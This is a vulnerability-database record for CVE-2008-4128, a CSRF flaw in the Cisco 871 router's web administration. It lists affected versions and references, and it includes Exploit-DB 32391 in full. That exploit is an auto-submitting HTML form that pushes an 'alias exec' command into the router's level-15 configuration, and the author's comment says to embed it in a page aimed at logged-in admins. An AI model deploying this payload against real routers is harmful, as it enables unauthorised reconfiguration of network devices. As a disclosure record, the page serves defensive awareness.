Sign-up

ID

VAR-E-200809-0316


CVE

cve_id:CVE-2008-4128

Trust: 0.3

sources: BID: 31218

EDB ID

32391


TITLE

Cisco 871 Integrated Services Router - Cross-Site Request Forgery (2) - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 32391

DESCRIPTION

Cisco 871 Integrated Services Router - Cross-Site Request Forgery (2).. remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 32391

AFFECTED PRODUCTS

vendor:ciscomodel:integrated services routerscope:eqversion:871

Trust: 1.6

vendor:ciscomodel:iosscope:eqversion:12.4

Trust: 0.3

vendor:ciscomodel:integrated services routerscope:eqversion:8710

Trust: 0.3

sources: BID: 31218 // EXPLOIT-DB: 32391 // EDBNET: 53924

EXPLOIT

source: https://www.securityfocus.com/bid/31218/info

The Cisco 871 Integrated Services Router is prone to a cross-site request-forgery vulnerability.

Successful exploits can run arbitrary commands on affected devices. This may lead to further network-based attacks.

The 871 Integrated Services Router under IOS 12.4 is vulnerable; other products and versions may also be affected.

<!-- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com] Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit #2 Replace "example.com" with the IP address of the target router, embed this in a web page and hope for the best. Cisco Admin's + Safari are the best targets ;) --> <html> <body> <body onload="fdsa.submit();"> <form name=fdsa method="post" action="http://example.com/level/15/exec/-/configure/http"> <input type=hidden name=command value="alias exec xx xx"> <input type=hidden name=command_url value="/level/15/exec/-"> <input type=hidden name=new_command_url value="/level/15/configure/-"> </body> </html>

Trust: 1.0

sources: EXPLOIT-DB: 32391

EXPLOIT LANGUAGE

html

Trust: 0.6

sources: EXPLOIT-DB: 32391

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 32391

TYPE

Cross-Site Request Forgery (2)

Trust: 1.0

sources: EXPLOIT-DB: 32391

CREDITS

Jeremy Brown

Trust: 0.6

sources: EXPLOIT-DB: 32391

EXTERNAL IDS

db:EXPLOIT-DBid:32391

Trust: 1.9

db:BIDid:31218

Trust: 1.9

db:EDBNETid:53924

Trust: 0.6

db:NVDid:CVE-2008-4128

Trust: 0.3

sources: BID: 31218 // EXPLOIT-DB: 32391 // EDBNET: 53924

REFERENCES

url:https://www.securityfocus.com/bid/31218/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/32391/

Trust: 0.6

url:https://www.exploit-db.com/exploits/32391

Trust: 0.3

url:http://jbrownsec.blogspot.com/2008/09/cisco-0day-released.html

Trust: 0.3

url:http://www.cisco.com

Trust: 0.3

url:http://www.cisco.com/en/us/products/ps6200/

Trust: 0.3

url:https://www.exploit-db.com/exploits/32390

Trust: 0.3

sources: BID: 31218 // EXPLOIT-DB: 32391 // EDBNET: 53924

SOURCES

db:BIDid:31218
db:EXPLOIT-DBid:32391
db:EDBNETid:53924

LAST UPDATE DATE

2022-07-27T09:20:04.044000+00:00


SOURCES UPDATE DATE

db:BIDid:31218date:2015-05-07T17:23:00

SOURCES RELEASE DATE

db:BIDid:31218date:2008-09-17T00:00:00
db:EXPLOIT-DBid:32391date:2008-09-17T00:00:00
db:EDBNETid:53924date:2008-09-17T00:00:00